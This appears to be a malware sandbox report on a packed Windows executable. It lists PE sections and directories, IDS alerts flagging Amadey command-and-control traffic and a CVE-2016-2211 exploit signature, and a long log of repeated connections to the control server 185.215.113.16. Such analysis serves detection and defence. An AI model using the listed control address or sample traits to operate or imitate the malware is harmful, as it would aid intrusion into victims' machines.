                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add dword ptr [eax+00000000h], eax
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              push es
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x4c90780x10aosdyjib
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x4c90280x18aosdyjib
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x680000x2de00dc59c5b8e2d919b69560d19a4ce219bcFalse0.9974508259536785OpenPGP Public Key7.982355367742593IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x690000x1e00x200ffb5d5409b71685f3a099b9b15f8767eFalse0.578125data4.530262538151211IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x6b0000x2b80000x200dac3755964989485aa14fcebbd1efeb4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              aosdyjib0x3230000x1a70000x1a6400b49632a5c89154bcf079d734e63401ffFalse0.9943002053730018data7.955301660952693IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              ttauocqi0x4ca0000x10000x6004125af4f26f5ed0bdc28e12e88ef3377False0.5462239583333334data4.815255135471417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x4cb0000x30000x2200b392d5e8fc622fae13e55efcba783853False0.06387867647058823DOS executable (COM)0.745067519382054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_MANIFEST0x4c90880x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                              DLLImport
                              kernel32.dlllstrcpy
                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States
                              TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                              2024-07-26T20:59:31.436749+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435110320.12.23.50192.168.2.6
                              2024-07-26T20:59:05.168665+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34969980192.168.2.6185.215.113.16
                              2024-07-26T20:59:12.810336+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434970640.127.169.103192.168.2.6
                              2024-07-26T20:59:32.438755+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435110520.12.23.50192.168.2.6
                              2024-07-26T20:59:17.974952+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34971780192.168.2.6185.215.113.16
                              2024-07-26T20:59:06.351188+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34970080192.168.2.6185.215.113.16
                              TimestampSource PortDest PortSource IPDest IP
                              Jul 26, 2024 20:59:03.946652889 CEST4969980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:03.951591969 CEST8049699185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:03.951663017 CEST4969980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:03.951773882 CEST4969980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:03.956549883 CEST8049699185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:05.168243885 CEST8049699185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:05.168586969 CEST8049699185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:05.168664932 CEST4969980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:05.170865059 CEST4969980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:05.175967932 CEST8049699185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:05.433532953 CEST8049699185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:05.433763981 CEST4969980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:05.548113108 CEST4969980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:05.548451900 CEST4970080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:05.560940027 CEST8049700185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:05.560955048 CEST8049699185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:05.561064959 CEST4969980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:05.561077118 CEST4970080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:05.561290979 CEST4970080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:05.568454027 CEST8049700185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:06.351094007 CEST8049700185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:06.351187944 CEST4970080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:06.351958990 CEST4970080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:06.356884956 CEST8049700185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:06.606599092 CEST8049700185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:06.606703997 CEST4970080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:06.719954014 CEST4970080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:06.720371962 CEST4970180192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:06.726691961 CEST8049700185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:06.726872921 CEST4970080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:06.726882935 CEST8049701185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:06.726972103 CEST4970180192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:06.727173090 CEST4970180192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:06.733504057 CEST8049701185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:07.535132885 CEST8049701185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:07.535214901 CEST4970180192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:07.536278009 CEST4970180192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:07.549854040 CEST8049701185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:07.806822062 CEST8049701185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:07.807051897 CEST4970180192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:07.923226118 CEST4970180192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:07.923548937 CEST4970280192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:07.954974890 CEST8049702185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:07.956955910 CEST4970280192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:07.956955910 CEST4970280192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:07.958190918 CEST8049701185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:07.958359957 CEST4970180192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:07.961836100 CEST8049702185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:08.716974974 CEST8049702185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:08.717116117 CEST4970280192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:08.717758894 CEST4970280192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:08.722981930 CEST8049702185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:09.033060074 CEST8049702185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:09.033152103 CEST4970280192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:09.141679049 CEST4970280192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:09.141980886 CEST4970380192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:09.147413015 CEST8049703185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:09.147483110 CEST4970380192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:09.147656918 CEST4970380192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:09.148591995 CEST8049702185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:09.148647070 CEST4970280192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:09.153306007 CEST8049703185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:09.888726950 CEST8049703185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:09.888809919 CEST4970380192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:09.889708996 CEST4970380192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:09.895087957 CEST8049703185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:10.137224913 CEST8049703185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:10.137301922 CEST4970380192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:10.250926971 CEST4970380192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:10.251205921 CEST4970480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:10.256151915 CEST8049704185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:10.256247044 CEST4970480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:10.256383896 CEST4970480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:10.256715059 CEST8049703185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:10.256776094 CEST4970380192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:10.261275053 CEST8049704185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:11.053632021 CEST8049704185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:11.053838968 CEST4970480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:11.054737091 CEST4970480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:11.061542988 CEST8049704185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:11.302748919 CEST8049704185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:11.302798986 CEST4970480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:11.407198906 CEST4970480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:11.407494068 CEST4970880192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:11.412373066 CEST8049708185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:11.412507057 CEST4970880192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:11.412678003 CEST4970880192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:11.412688017 CEST8049704185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:11.412746906 CEST4970480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:11.417485952 CEST8049708185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:12.245943069 CEST8049708185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:12.246722937 CEST4970880192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:12.246722937 CEST4970880192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:12.252633095 CEST8049708185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:12.502916098 CEST8049708185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:12.504511118 CEST4970880192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:12.612114906 CEST4971080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:12.612510920 CEST4970880192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:12.625417948 CEST8049710185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:12.625514030 CEST4971080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:12.625777006 CEST4971080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:12.634780884 CEST8049708185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:12.634865046 CEST4970880192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:12.635410070 CEST8049710185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:13.428133965 CEST8049710185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:13.428203106 CEST4971080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:13.436844110 CEST4971080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:13.443109989 CEST8049710185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:13.689023972 CEST8049710185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:13.689100981 CEST4971080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:13.798367023 CEST4971080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:13.798795938 CEST4971480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:13.808448076 CEST8049714185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:13.811306000 CEST4971480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:13.811487913 CEST4971480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:13.812731028 CEST8049710185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:13.812877893 CEST4971080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:13.819690943 CEST8049714185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:14.559926987 CEST8049714185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:14.561019897 CEST4971480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:14.561880112 CEST4971480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:14.566879034 CEST8049714185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:14.808888912 CEST8049714185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:14.817511082 CEST4971480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:14.923207998 CEST4971480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:14.923660994 CEST4971580192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:14.928966999 CEST8049715185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:14.929059029 CEST4971580192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:14.929208994 CEST4971580192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:14.929563999 CEST8049714185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:14.929622889 CEST4971480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:14.934427977 CEST8049715185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:15.678265095 CEST8049715185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:15.678358078 CEST4971580192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:15.679366112 CEST4971580192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:15.684454918 CEST8049715185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:15.942840099 CEST8049715185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:15.943058968 CEST4971580192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:16.047677040 CEST4971580192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:16.048042059 CEST4971680192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:16.053165913 CEST8049716185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:16.053277969 CEST4971680192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:16.053364038 CEST4971680192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:16.054805040 CEST8049715185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:16.054872990 CEST4971580192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:16.061712027 CEST8049716185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:16.804059982 CEST8049716185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:16.804171085 CEST4971680192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:16.805102110 CEST4971680192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:16.809995890 CEST8049716185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:17.097984076 CEST8049716185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:17.098088980 CEST4971680192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:17.204041004 CEST4971680192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:17.210047960 CEST8049716185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:17.210129023 CEST4971680192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:17.212181091 CEST4971780192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:17.217104912 CEST8049717185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:17.217183113 CEST4971780192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:17.217320919 CEST4971780192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:17.222837925 CEST8049717185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:17.974831104 CEST8049717185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:17.974951982 CEST4971780192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:17.975611925 CEST4971780192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:17.980572939 CEST8049717185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:18.225573063 CEST8049717185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:18.225737095 CEST4971780192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:18.329166889 CEST4971780192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:18.329478979 CEST4971880192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:18.334671974 CEST8049718185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:18.334791899 CEST4971880192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:18.334990025 CEST4971880192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:18.335597992 CEST8049717185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:18.335652113 CEST4971780192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:18.340624094 CEST8049718185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:19.122694969 CEST8049718185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:19.122843027 CEST4971880192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:19.123709917 CEST4971880192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:19.128505945 CEST8049718185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:19.375066996 CEST8049718185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:19.375219107 CEST4971880192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:19.485443115 CEST4971880192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:19.485758066 CEST4971980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:19.490629911 CEST8049719185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:19.490796089 CEST4971980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:19.490911007 CEST8049718185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:19.491050959 CEST4971880192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:19.491379976 CEST4971980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:19.496206045 CEST8049719185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:20.281785965 CEST8049719185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:20.282078981 CEST4971980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:20.282890081 CEST4971980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:20.288091898 CEST8049719185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:20.543345928 CEST8049719185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:20.543595076 CEST4971980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:20.658140898 CEST4971980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:20.658428907 CEST4972080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:20.663289070 CEST8049720185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:20.663410902 CEST4972080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:20.663645029 CEST8049719185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:20.663717031 CEST4971980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:20.663923979 CEST4972080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:20.669610977 CEST8049720185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:21.412055016 CEST8049720185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:21.412144899 CEST4972080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:21.415652037 CEST4972080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:21.420804977 CEST8049720185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:21.671369076 CEST8049720185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:21.671474934 CEST4972080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:21.783030033 CEST4972080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:21.783484936 CEST4972180192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:21.788775921 CEST8049721185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:21.788881063 CEST4972180192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:21.789062977 CEST4972180192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:21.789299965 CEST8049720185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:21.789371014 CEST4972080192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:21.794023037 CEST8049721185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:22.565438986 CEST8049721185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:22.565538883 CEST4972180192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:22.566241980 CEST4972180192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:22.571108103 CEST8049721185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:22.830981970 CEST8049721185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:22.831058025 CEST4972180192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:22.939064026 CEST4972180192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:22.939476013 CEST4972280192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:22.946106911 CEST8049722185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:22.946219921 CEST4972280192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:22.946376085 CEST4972280192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:22.961138010 CEST8049722185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:22.977982044 CEST8049721185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:22.978060007 CEST4972180192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:23.721822977 CEST8049722185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:23.721925974 CEST4972280192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:23.722713947 CEST4972280192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:23.727591038 CEST8049722185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:23.971482038 CEST8049722185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:23.971697092 CEST4972280192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:24.079356909 CEST4972280192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:24.079632998 CEST4972380192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:24.086585999 CEST8049723185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:24.086707115 CEST4972380192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:24.086798906 CEST8049722185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:24.086853981 CEST4972280192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:24.087443113 CEST4972380192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:24.092969894 CEST8049723185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:24.839623928 CEST8049723185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:24.839795113 CEST4972380192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:24.840555906 CEST4972380192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:24.845401049 CEST8049723185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:25.089128971 CEST8049723185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:25.089391947 CEST4972380192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:25.204041004 CEST4972380192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:25.204349041 CEST4972480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:25.209383011 CEST8049723185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:25.209489107 CEST4972380192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:25.210736990 CEST8049724185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:25.210832119 CEST4972480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:25.211030006 CEST4972480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:25.215868950 CEST8049724185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:26.012787104 CEST8049724185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:26.012912035 CEST4972480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:26.013551950 CEST4972480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:26.018448114 CEST8049724185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:26.261593103 CEST8049724185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:26.261713028 CEST4972480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:26.376032114 CEST4972480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:26.376372099 CEST4972580192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:26.381438971 CEST8049725185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:26.381530046 CEST4972580192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:26.381643057 CEST8049724185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:26.381644964 CEST4972580192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:26.381697893 CEST4972480192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:26.386552095 CEST8049725185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:27.143990040 CEST8049725185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:27.144182920 CEST4972580192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:27.144716978 CEST4972580192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:27.149626970 CEST8049725185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:27.395840883 CEST8049725185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:27.396035910 CEST4972580192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:27.500977039 CEST4972580192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:27.501091003 CEST5109980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:27.505939007 CEST8051099185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:27.506014109 CEST5109980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:27.506100893 CEST5109980192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:27.506696939 CEST8049725185.215.113.16192.168.2.6
                              Jul 26, 2024 20:59:27.506752014 CEST4972580192.168.2.6185.215.113.16
                              Jul 26, 2024 20:59:27.510968924 CEST8051099185.215.113.16192.168.2.6
